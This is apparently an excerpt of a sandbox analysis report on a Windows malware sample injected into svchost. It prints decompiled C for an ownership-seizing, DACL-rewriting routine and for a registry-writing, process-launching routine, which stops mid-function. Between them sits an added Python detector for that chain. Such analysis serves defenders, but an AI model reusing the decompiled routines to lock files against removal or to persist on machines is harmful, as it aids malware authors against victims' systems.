                                                                                                                                  0x02517b61
                                                                                                                                  0x02517bb8
                                                                                                                                  0x02517bcb
                                                                                                                                  0x02517bce
                                                                                                                                  0x02517bd4
                                                                                                                                  0x02517bd6
                                                                                                                                  0x02517da6
                                                                                                                                  0x00000000
                                                                                                                                  0x02517da6
                                                                                                                                  0x02517bdc
                                                                                                                                  0x02517bdf
                                                                                                                                  0x02517be1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517be9
                                                                                                                                  0x02517beb
                                                                                                                                  0x02517bee
                                                                                                                                  0x02517bf2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02517bf8
                                                                                                                                  0x02517bf8
                                                                                                                                  0x02517c00
                                                                                                                                  0x02517c06
                                                                                                                                  0x02517c08
                                                                                                                                  0x02517cc6
                                                                                                                                  0x02517cc6
                                                                                                                                  0x02517cc6
                                                                                                                                  0x02517cc6
                                                                                                                                  0x00000000
                                                                                                                                  0x02517cc6
                                                                                                                                  0x02517c14
                                                                                                                                  0x02517c16
                                                                                                                                  0x02517c19
                                                                                                                                  0x02517c1b
                                                                                                                                  0x02517c4f
                                                                                                                                  0x02517c4f
                                                                                                                                  0x02517c52
                                                                                                                                  0x02517c57
                                                                                                                                  0x02517c5e
                                                                                                                                  0x02517c5e
                                                                                                                                  0x02517c5e
                                                                                                                                  0x02517c66
                                                                                                                                  0x02517c6c
                                                                                                                                  0x02517c6f
                                                                                                                                  0x02517c71
                                                                                                                                  0x02517c86
                                                                                                                                  0x02517c73
                                                                                                                                  0x02517c78
                                                                                                                                  0x02517c7f
                                                                                                                                  0x02517c7f
                                                                                                                                  0x02517c8b
                                                                                                                                  0x02517c8e
                                                                                                                                  0x02517c90

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.KERNEL32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 02517ABA
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 02517ADF
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,0252070C,?,?,?), ref: 02517B16
                                                                                                                                  • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 02517B3B
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 02517B59
                                                                                                                                  • EqualSid.ADVAPI32(?,00000022), ref: 02517B6A
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 02517B7E
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02517B8C
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02517B9C
                                                                                                                                  • RegSetKeySecurity.KERNEL32(00000000,00000001,00000000), ref: 02517BAB
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 02517BB2
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,02517FC9,?,00000000), ref: 02517BCE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                                                                  • String ID: C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$D
                                                                                                                                  • API String ID: 2976863881-1098992889
                                                                                                                                  • Opcode ID: beb1952c70e107c28806fcd85d36d02608f995ef3827480df7896ea693ee48cc
                                                                                                                                  • Instruction ID: 7e7c1e9d5fabf6dd567b878be2c2488e3e1a8a4e2c400ca063a76c3ede799729
                                                                                                                                  • Opcode Fuzzy Hash: beb1952c70e107c28806fcd85d36d02608f995ef3827480df7896ea693ee48cc
                                                                                                                                  • Instruction Fuzzy Hash: 8EA15E71D41219AFEF218FA4CC88EFEBFB9FB49304F054469E505E2180E7359A49DB68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 748 2517809-2517837 GetUserNameA 749 251783d-251786e LookupAccountNameA 748->749 750 2517a8e-2517a94 748->750 749->750 751 2517874-25178a2 GetLengthSid GetFileSecurityA 749->751 751->750 752 25178a8-25178c3 GetSecurityDescriptorOwner 751->752 753 25178c5-25178da EqualSid 752->753 754 251791d-251793b GetSecurityDescriptorDacl 752->754 753->754 755 25178dc-25178ed LocalAlloc 753->755 756 2517941-2517946 754->756 757 2517a8d 754->757 755->754 758 25178ef-25178f9 InitializeSecurityDescriptor 755->758 756->757 759 251794c-2517955 756->759 757->750 760 2517916-2517917 LocalFree 758->760 761 25178fb-2517909 SetSecurityDescriptorOwner 758->761 759->757 762 251795b-251796b GetAce 759->762 760->754 761->760 763 251790b-2517910 SetFileSecurityA 761->763 764 2517971-251797e 762->764 765 2517a2a 762->765 763->760 766 2517980-2517992 EqualSid 764->766 767 25179ae-25179b1 764->767 768 2517a2d-2517a37 765->768 771 2517994-2517997 766->771 772 2517999-251799b 766->772 769 25179b3-25179bd 767->769 770 25179be-25179d0 EqualSid 767->770 768->762 773 2517a3d-2517a41 768->773 769->770 775 25179d2-25179e3 770->775 776 25179e5 770->776 771->766 771->772 772->767 777 251799d-25179ac DeleteAce 772->777 773->757 774 2517a43-2517a54 LocalAlloc 773->774 774->757 778 2517a56-2517a60 InitializeSecurityDescriptor 774->778 779 25179ea-25179ed 775->779 776->779 777->768 780 2517a62-2517a71 SetSecurityDescriptorDacl 778->780 781 2517a86-2517a87 LocalFree 778->781 782 25179f8-25179fb 779->782 783 25179ef-25179f5 779->783 780->781 784 2517a73-2517a81 SetFileSecurityA 780->784 781->757 785 2517a03-2517a0e 782->785 786 25179fd-2517a01 782->786 783->782 784->781 787 2517a83 784->787 788 2517a10-2517a17 785->788 789 2517a19-2517a24 785->789 786->765 786->785 787->781 790 2517a27 788->790 789->790 790->765
                                                                                                                                  C-Code - Quality: 98%
                                                                                                                                  			E02517809(CHAR* _a4, signed int _a8) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* _v16;
                                                                                                                                  				struct _ACL* _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				int _v28;
                                                                                                                                  				long _v32;
                                                                                                                                  				long _v36;
                                                                                                                                  				long _v40;
                                                                                                                                  				long _v44;
                                                                                                                                  				int _v48;
                                                                                                                                  				int _v52;
                                                                                                                                  				union _SID_NAME_USE _v56;
                                                                                                                                  				int _v60;
                                                                                                                                  				void _v128;
                                                                                                                                  				char _v384;
                                                                                                                                  				char _v512;
                                                                                                                                  				struct _SECURITY_DESCRIPTOR _v1536;
                                                                                                                                  				int _t87;
                                                                                                                                  				int _t95;
                                                                                                                                  				int _t100;
                                                                                                                                  				struct _ACL* _t110;
                                                                                                                                  				int _t116;
                                                                                                                                  				int _t120;
                                                                                                                                  				intOrPtr _t121;
                                                                                                                                  				signed int _t123;
                                                                                                                                  				signed int _t141;
                                                                                                                                  				char* _t146;
                                                                                                                                  				signed int _t153;
                                                                                                                                  				void* _t154;
                                                                                                                                  				void* _t155;
                                                                                                                                  				void* _t156;
                                                                                                                                  
                                                                                                                                  				_t141 = 0;
                                                                                                                                  				_v28 = 0;
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				_v36 = 0x80;
                                                                                                                                  				_t87 = GetUserNameA( &_v384,  &_v36); // executed
                                                                                                                                  				if(_t87 == 0) {
                                                                                                                                  					L42:
                                                                                                                                  					return _v28;
                                                                                                                                  				}
                                                                                                                                  				_v32 = 0x44;
                                                                                                                                  				_v40 = 0x80;
                                                                                                                                  				_t95 = LookupAccountNameA(0,  &_v384,  &_v128,  &_v32,  &_v512,  &_v40,  &_v56); // executed
                                                                                                                                  				if(_t95 == 0) {
                                                                                                                                  					goto L42;
                                                                                                                                  				}
                                                                                                                                  				_v32 = GetLengthSid( &_v128);
                                                                                                                                  				_v44 = 0x400;
                                                                                                                                  				_t100 = GetFileSecurityA(_a4, 5,  &_v1536, 0x400,  &_v44); // executed
                                                                                                                                  				if(_t100 == 0) {
                                                                                                                                  					goto L42;
                                                                                                                                  				}
                                                                                                                                  				if(GetSecurityDescriptorOwner( &_v1536,  &_v16,  &_v48) != 0) {
                                                                                                                                  					_v36 = 0x80;
                                                                                                                                  					_v40 = 0x80;
                                                                                                                                  					if(EqualSid( &_v128, _v16) == 0) {
                                                                                                                                  						_v28 = 1;
                                                                                                                                  						_t155 = LocalAlloc(0x40, 0x14);
                                                                                                                                  						if(_t155 != 0) {
                                                                                                                                  							if(InitializeSecurityDescriptor(_t155, 1) != 0 && SetSecurityDescriptorOwner(_t155,  &_v128, 0) != 0) {
                                                                                                                                  								SetFileSecurityA(_a4, 1, _t155); // executed
                                                                                                                                  							}
                                                                                                                                  							LocalFree(_t155);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_v24 = _t141;
                                                                                                                                  				if(GetSecurityDescriptorDacl( &_v1536,  &_v60,  &_v20,  &_v52) == 0) {
                                                                                                                                  					L41:
                                                                                                                                  					goto L42;
                                                                                                                                  				}
                                                                                                                                  				_t110 = _v20;
                                                                                                                                  				if(_t110 == _t141) {
                                                                                                                                  					goto L41;
                                                                                                                                  				}
                                                                                                                                  				_v8 = _v8 & _t141;
                                                                                                                                  				if(0 >= _t110->AceCount) {
                                                                                                                                  					goto L41;
                                                                                                                                  				} else {
                                                                                                                                  					goto L13;
                                                                                                                                  				}
                                                                                                                                  				do {
                                                                                                                                  					L13:
                                                                                                                                  					if(GetAce(_t110, _v8,  &_v12) == 0) {
                                                                                                                                  						L32:
                                                                                                                                  						_v8 = _v8 + 1;
                                                                                                                                  						goto L33;
                                                                                                                                  					}
                                                                                                                                  					_t153 = 0;
                                                                                                                                  					_v16 = _v12 + 8;
                                                                                                                                  					if(_t141 <= 0) {
                                                                                                                                  						L19:
                                                                                                                                  						if(_t141 < 0x20) {
                                                                                                                                  							 *((intOrPtr*)(_t156 + _t141 * 4 - 0xfc)) = _v16;
                                                                                                                                  							_t141 = _t141 + 1;
                                                                                                                                  						}
                                                                                                                                  						_t120 = EqualSid( &_v128, _v16);
                                                                                                                                  						_t146 = _v12;
                                                                                                                                  						if(_t120 == 0) {
                                                                                                                                  							_t121 = 0x1200a8;
                                                                                                                                  						} else {
                                                                                                                                  							asm("sbb eax, eax");
                                                                                                                                  							_t121 = ( ~_a8 & 0x00090046) + 0x1601b9;
                                                                                                                                  						}
                                                                                                                                  						if( *((intOrPtr*)(_t146 + 4)) != _t121) {
                                                                                                                                  							 *((intOrPtr*)(_t146 + 4)) = _t121;
                                                                                                                                  							_t146 = _v12;
                                                                                                                                  							_v24 = 1;
                                                                                                                                  						}
                                                                                                                                  						if( *_t146 != 0 || ( *(_t146 + 1) & 0x00000010) != 0) {
                                                                                                                                  							 *_t146 = 0;
                                                                                                                                  							_t66 = _v16 + 8; // 0xc8685f74
                                                                                                                                  							_t123 =  *_t66;
                                                                                                                                  							if(_t123 != 0) {
                                                                                                                                  								 *((char*)(_v12 + 1)) = (_t123 & 0xffffff00 | _t123 - 0x00000050 > 0x00000000) + 2;
                                                                                                                                  							} else {
                                                                                                                                  								 *((char*)(_v12 + 1)) = 0xb;
                                                                                                                                  							}
                                                                                                                                  							_v24 = 1;
                                                                                                                                  						}
                                                                                                                                  						goto L32;
                                                                                                                                  					}
                                                                                                                                  					while(EqualSid( *(_t156 + _t153 * 4 - 0xfc), _v16) == 0) {
                                                                                                                                  						_t153 = _t153 + 1;
                                                                                                                                  						if(_t153 < _t141) {
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					if(_t153 >= _t141) {
                                                                                                                                  						goto L19;
                                                                                                                                  					}
                                                                                                                                  					DeleteAce(_v20, _v8);
                                                                                                                                  					_v24 = 1;
                                                                                                                                  					L33:
                                                                                                                                  					_t110 = _v20;
                                                                                                                                  				} while (_v8 < (_t110->AceCount & 0x0000ffff));
                                                                                                                                  				if(_v24 != 0) {
                                                                                                                                  					_v28 = 1;
                                                                                                                                  					_t154 = LocalAlloc(0x40, 0x14);
                                                                                                                                  					if(_t154 != 0) {
                                                                                                                                  						if(InitializeSecurityDescriptor(_t154, 1) != 0 && SetSecurityDescriptorDacl(_t154, 1, _v20, 0) != 0) {
                                                                                                                                  							_t116 = SetFileSecurityA(_a4, 4, _t154); // executed
                                                                                                                                  							if(_t116 != 0) {
                                                                                                                                  								_v28 = 1;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						LocalFree(_t154);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				goto L41;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 0251782F
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02517866
                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 02517878
                                                                                                                                  • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0251789A
                                                                                                                                  • GetSecurityDescriptorOwner.ADVAPI32(?,02517F63,?), ref: 025178B8
                                                                                                                                  • EqualSid.ADVAPI32(?,02517F63), ref: 025178D2
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 025178E3
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 025178F1
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02517901
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02517910
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 02517917
                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02517933
                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 02517963
                                                                                                                                  • EqualSid.ADVAPI32(?,02517F63), ref: 0251798A
                                                                                                                                  • DeleteAce.ADVAPI32(?,00000000), ref: 025179A3
                                                                                                                                  • EqualSid.ADVAPI32(?,02517F63), ref: 025179C5
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 02517A4A
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02517A58
                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02517A69
                                                                                                                                  • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02517A79
                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 02517A87
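Read in call-site order, the API list above is a take-ownership-then-rewrite-DACL routine: GetFileSecurityA is called with SECURITY_INFORMATION 0x5 (OWNER | DACL), the owner SID is compared against the current user's SID (GetUserNameA, LookupAccountNameA, EqualSid) and replaced where it differs (SetSecurityDescriptorOwner, SetFileSecurityA with 0x1 = OWNER), then the DACL is walked with GetAce/EqualSid/DeleteAce and written back (SetSecurityDescriptorDacl, SetFileSecurityA with 0x4 = DACL). The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses API lines in the report's format, orders them by the call-site address in the ref field, decodes the SECURITY_INFORMATION masks and flags that chain. The embedded input is the list above copied verbatim; the function and finding names are this example's own.

```python
import re
from dataclasses import dataclass

# Sample input: the "APIs" lines listed for this function in the report
# above, copied verbatim (sandbox output, not code from the sample).
SAMPLE_API_LINES = """\
• GetUserNameA.ADVAPI32(?,?), ref: 0251782F
• LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 02517866
• GetLengthSid.ADVAPI32(?), ref: 02517878
• GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 0251789A
• GetSecurityDescriptorOwner.ADVAPI32(?,02517F63,?), ref: 025178B8
• EqualSid.ADVAPI32(?,02517F63), ref: 025178D2
• LocalAlloc.KERNEL32(00000040,00000014), ref: 025178E3
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 025178F1
• SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 02517901
• SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 02517910
• LocalFree.KERNEL32(00000000), ref: 02517917
• GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 02517933
• GetAce.ADVAPI32(?,00000000,?), ref: 02517963
• EqualSid.ADVAPI32(?,02517F63), ref: 0251798A
• DeleteAce.ADVAPI32(?,00000000), ref: 025179A3
• EqualSid.ADVAPI32(?,02517F63), ref: 025179C5
• LocalAlloc.KERNEL32(00000040,00000014), ref: 02517A4A
• InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 02517A58
• SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 02517A69
• SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 02517A79
• LocalFree.KERNEL32(00000000), ref: 02517A87
"""

# One report line: "<api>.<module>(<args>), ref: <call-site address>"
_API_LINE = re.compile(
    r"^\s*[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# SECURITY_INFORMATION bits (winnt.h) passed to Get/SetFileSecurity.
OWNER_SECURITY_INFORMATION = 0x1
DACL_SECURITY_INFORMATION = 0x4
_SECURITY_INFORMATION_NAMES = {
    OWNER_SECURITY_INFORMATION: "OWNER_SECURITY_INFORMATION",
    0x2: "GROUP_SECURITY_INFORMATION",
    DACL_SECURITY_INFORMATION: "DACL_SECURITY_INFORMATION",
    0x8: "SACL_SECURITY_INFORMATION",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: list   # int for constants the sandbox resolved, None for "?"
    ref: int     # address of the call instruction


def parse_api_lines(text):
    """Parse report API lines and sort them by call-site address."""
    calls = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if m is None:
            continue  # headings, blank lines, anything that is not an API line
        raw = m["args"].strip()
        args = [None if t.strip() in ("", "?") else int(t, 16) for t in raw.split(",")] if raw else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16)))
    # Address order is the static order of call sites; where the code loops
    # (GetAce/EqualSid/DeleteAce here) the runtime order repeats these entries.
    calls.sort(key=lambda c: c.ref)
    return calls


def decode_security_information(mask):
    """Name the SECURITY_INFORMATION bits set in a Get/SetFileSecurity argument."""
    names = [name for bit, name in _SECURITY_INFORMATION_NAMES.items() if mask & bit]
    unknown = mask & ~sum(_SECURITY_INFORMATION_NAMES)
    if unknown:
        names.append(f"0x{unknown:x}")
    return names


def _arg_is(call, index, value):
    # A "?" argument is unresolved, so it never satisfies a constant check.
    return len(call.args) > index and call.args[index] == value


def _find(calls, api, pred=lambda c: True, start=0):
    for i in range(start, len(calls)):
        if calls[i].api == api and pred(calls[i]):
            return i
    return -1


def detect_acl_rewrite(calls):
    """Flag the take-ownership-then-strip-DACL chain in an address-ordered call list."""
    both = OWNER_SECURITY_INFORMATION | DACL_SECURITY_INFORMATION
    read = _find(calls, "GetFileSecurityA",
                 lambda c: len(c.args) > 1 and c.args[1] is not None and c.args[1] & both == both)
    set_owner = _find(calls, "SetSecurityDescriptorOwner")
    write_owner = _find(calls, "SetFileSecurityA",
                        lambda c: _arg_is(c, 1, OWNER_SECURITY_INFORMATION), start=max(set_owner, 0))
    read_dacl = _find(calls, "GetSecurityDescriptorDacl")
    delete_ace = _find(calls, "DeleteAce", start=max(read_dacl, 0))
    set_dacl = _find(calls, "SetSecurityDescriptorDacl")
    write_dacl = _find(calls, "SetFileSecurityA",
                       lambda c: _arg_is(c, 1, DACL_SECURITY_INFORMATION), start=max(set_dacl, 0))
    findings = {
        "reads_owner_and_dacl": read >= 0,
        "rewrites_owner": set_owner >= 0 and write_owner > set_owner,
        "deletes_ace": read_dacl >= 0 and delete_ace > read_dacl,
        "rewrites_dacl": set_dacl >= 0 and write_dacl > set_dacl,
    }
    findings["acl_self_protection"] = all(findings.values())
    return findings


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE_API_LINES)
    for call in parsed:
        if call.api in ("GetFileSecurityA", "SetFileSecurityA"):
            print(f"{call.ref:08X} {call.api} {decode_security_information(call.args[1])}")
    print(detect_acl_rewrite(parsed))
```

Two caveats when reading this kind of list: the ref column is the address of the call instruction, so sorting by it reproduces the static layout, not the runtime trace (the ACE walk is a loop, and the DeleteAce index shown as 00000000 is one call's snapshot); and arguments the sandbox could not resolve appear as ?, which the checks above deliberately treat as unknown rather than as a match.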
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 3722657555-2746444292
                                                                                                                                  • Opcode ID: 0e24216b5f0f4a4f08eef9009f3354cc1bb8029cdad2448f26e489b7435071f6
                                                                                                                                  • Instruction ID: 25f01e1d43dcd71ab31b30ee91f1ef54238bf2aae154a9cd82edba51b1360614
                                                                                                                                  • Opcode Fuzzy Hash: 0e24216b5f0f4a4f08eef9009f3354cc1bb8029cdad2448f26e489b7435071f6
                                                                                                                                  • Instruction Fuzzy Hash: 54815B71D0121AABEB21CFA8CD44FEEBBB8BF0D345F15446AE505E2180D7348649DFA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
control_flow_graph 791 2518328-251833e call 2517dd6 794 2518340-2518343 791->794 795 2518348-2518356 call 2516ec3 791->795 796 251877b-251877d 794->796 799 251846b-2518474 795->799 800 251835c-2518378 call 25173ff 795->800 801 25185c2-25185ce 799->801 802 251847a-2518480 799->802 812 2518464-2518466 800->812 813 251837e-2518384 800->813 804 25185d0-25185da call 251675c 801->804 805 2518615-2518620 801->805 802->801 806 2518486-25184ba call 2512544 RegOpenKeyExA 802->806 815 25185df-25185eb 804->815 810 25186a7-25186b0 call 2516ba7 805->810 811 2518626-251864c GetTempPathA call 2518274 call 251eca5 805->811 821 25184c0-25184db RegQueryValueExA 806->821 822 2518543-2518571 call 2512544 RegOpenKeyExA 806->822 830 2518762 810->830 831 25186b6-25186bd call 2517e2f 810->831 852 2518671-25186a4 call 2512544 call 251ef00 call 251ee2a 811->852 853 251864e-251866f call 251eca5 811->853 814 2518779-251877a 812->814 813->812 819 251838a-251838d 813->819 814->796 815->805 820 25185ed-25185ef 815->820 819->812 825 2518393-2518399 819->825 820->805 826 25185f1-25185fa 820->826 828 2518521-251852d RegCloseKey 821->828 829 25184dd-25184e1 821->829 846 2518573-251857b 822->846 847 25185a5-25185b7 call 251ee2a 822->847 833 251839c-25183a1 825->833 826->805 836 25185fc-251860f call 25124c2 826->836 828->822 834 251852f-2518541 call 251eed1 828->834 829->828 838 25184e3-25184e6 829->838 840 2518768-251876b 830->840 862 25186c3-251873b call 251ee2a * 2 lstrcpyA lstrlenA call 2517fcf CreateProcessA 831->862 863 251875b-251875c DeleteFileA 831->863 833->833 835 25183a3-25183af 833->835 834->822 834->847 843 25183b1 835->843 844 25183b3-25183ba 835->844 836->805 836->840 838->828 848 25184e8-25184f6 call 251ebcc 838->848 850 2518776-2518778 840->850 851 251876d-2518775 call 251ec2e 840->851 843->844 856 2518450-251845f call 251ee2a 844->856 857 25183c0-25183fb call 2512544 RegOpenKeyExA 844->857 859 251857e-2518583 846->859 847->801 879 25185b9-25185c1 call 251ec2e 847->879 848->828 878 25184f8-2518513 RegQueryValueExA 848->878 850->814 851->850 852->810 853->852 856->801 857->856 883 25183fd-251841c RegQueryValueExA 857->883 859->859 870 2518585-251859f RegSetValueExA RegCloseKey 859->870 899 251873d-251874d CloseHandle * 2 862->899 900 251874f-251875a call 2517ee6 call 2517ead 862->900 863->830 870->847 878->828 884 2518515-251851e call 251ec2e 878->884 879->801 888 251842d-2518441 RegSetValueExA 883->888 889 251841e-2518421 883->889 884->828 895 2518447-251844a RegCloseKey 888->895 889->888 894 2518423-2518426 889->894 894->888 898 2518428-251842b 894->898 895->856 898->888 898->895 899->840 900->863
                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E02518328(char* __ecx, char __edx) {
                                                                                                                                  				char _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				int _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				intOrPtr _v24;
                                                                                                                                  				int _v28;
                                                                                                                                  				struct _PROCESS_INFORMATION _v44;
                                                                                                                                  				char _v60;
                                                                                                                                  				struct _STARTUPINFOA _v128;
                                                                                                                                  				char _v388;
                                                                                                                                  				char _v427;
                                                                                                                                  				char _v428;
                                                                                                                                  				char _t88;
                                                                                                                                  				char _t89;
                                                                                                                                  				void* _t91;
                                                                                                                                  				char _t93;
                                                                                                                                  				int _t102;
                                                                                                                                  				char _t107;
                                                                                                                                  				intOrPtr _t113;
                                                                                                                                  				char _t116;
                                                                                                                                  				void* _t117;
                                                                                                                                  				signed int _t122;
                                                                                                                                  				char _t126;
                                                                                                                                  				void* _t128;
                                                                                                                                  				char* _t130;
                                                                                                                                  				char _t131;
                                                                                                                                  				char* _t133;
                                                                                                                                  				char _t134;
                                                                                                                                  				char* _t137;
                                                                                                                                  				int _t139;
                                                                                                                                  				char _t144;
                                                                                                                                  				char _t146;
                                                                                                                                  				char* _t147;
                                                                                                                                  				char _t149;
                                                                                                                                  				char _t153;
                                                                                                                                  				intOrPtr* _t154;
                                                                                                                                  				char* _t156;
                                                                                                                                  				char* _t159;
                                                                                                                                  				char _t160;
                                                                                                                                  				char _t165;
                                                                                                                                  				void* _t174;
                                                                                                                                  				signed int _t177;
                                                                                                                                  				char _t180;
                                                                                                                                  				char* _t188;
                                                                                                                                  				int _t189;
                                                                                                                                  				long _t193;
                                                                                                                                  				void* _t195;
                                                                                                                                  				void* _t196;
                                                                                                                                  				void* _t198;
                                                                                                                                  				void* _t199;
                                                                                                                                  
                                                                                                                                  				_t181 = __edx;
                                                                                                                                  				_t173 = __ecx;
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				if(E02517DD6(__edx) != 0) {
                                                                                                                                  					return 1;
                                                                                                                                  				}
                                                                                                                                  				_t88 = E02516EC3();
                                                                                                                                  				__eflags = _t88;
                                                                                                                                  				if(_t88 != 0) {
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					__eflags =  *0x2522c3c; // 0x0
                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                  						goto L37;
                                                                                                                                  					}
                                                                                                                                  					__eflags =  *0x2522c38; // 0x0
                                                                                                                                  					if(__eflags == 0) {
                                                                                                                                  						goto L37;
                                                                                                                                  					}
                                                                                                                                  					_t130 = E02512544(0x25222f8,  &E025206AC, 0x2e, 0xe4, 0xc8);
                                                                                                                                  					_t198 = _t196 + 0x14;
                                                                                                                                  					_t131 = RegOpenKeyExA(0x80000001, _t130, 0, 0x101,  &_v12);
                                                                                                                                  					__eflags = _t131;
                                                                                                                                  					if(_t131 != 0) {
                                                                                                                                  						L31:
                                                                                                                                  						_t133 = E02512544(0x25222f8,  &E025206AC, 0x2e, 0xe4, 0xc8);
                                                                                                                                  						_t198 = _t198 + 0x14;
                                                                                                                                  						_t134 = RegOpenKeyExA(0x80000001, _t133, 0, 0x103,  &_v12);
                                                                                                                                  						__eflags = _t134;
                                                                                                                                  						if(_t134 != 0) {
                                                                                                                                  							L35:
                                                                                                                                  							E0251EE2A(_t173, 0x25222f8, 0, 0x100);
                                                                                                                                  							_t196 = _t198 + 0xc;
                                                                                                                                  							__eflags = _v8;
                                                                                                                                  							if(_v8 != 0) {
                                                                                                                                  								E0251EC2E(_v8);
                                                                                                                                  							}
                                                                                                                                  							goto L37;
                                                                                                                                  						}
                                                                                                                                  						_t188 =  *0x2522c3c; // 0x0
                                                                                                                                  						_t137 = _t188;
                                                                                                                                  						_t44 =  &(_t137[1]); // 0x1
                                                                                                                                  						_t173 = _t44;
                                                                                                                                  						do {
                                                                                                                                  							_t181 =  *_t137;
                                                                                                                                  							_t137 =  &(_t137[1]);
                                                                                                                                  							__eflags = _t181;
                                                                                                                                  						} while (_t181 != 0);
                                                                                                                                  						_t139 = _t137 - _t173 + 1;
                                                                                                                                  						__eflags = _t139;
                                                                                                                                  						RegSetValueExA(_v12,  *0x2522c38, 0, 1, _t188, _t139);
                                                                                                                                  						RegCloseKey(_v12);
                                                                                                                                  						goto L35;
                                                                                                                                  					}
                                                                                                                                  					_t144 = RegQueryValueExA(_v12,  *0x2522c38, 0,  &_v28, 0,  &_v16);
                                                                                                                                  					__eflags = _t144;
                                                                                                                                  					if(_t144 == 0) {
                                                                                                                                  						__eflags = _v28 - 1;
                                                                                                                                  						if(_v28 == 1) {
                                                                                                                                  							__eflags = _v16;
                                                                                                                                  							if(_v16 > 0) {
                                                                                                                                  								_t147 = E0251EBCC(_v16);
                                                                                                                                  								_pop(_t173);
                                                                                                                                  								_v8 = _t147;
                                                                                                                                  								__eflags = _t147;
                                                                                                                                  								if(_t147 != 0) {
                                                                                                                                  									_t173 =  &_v16;
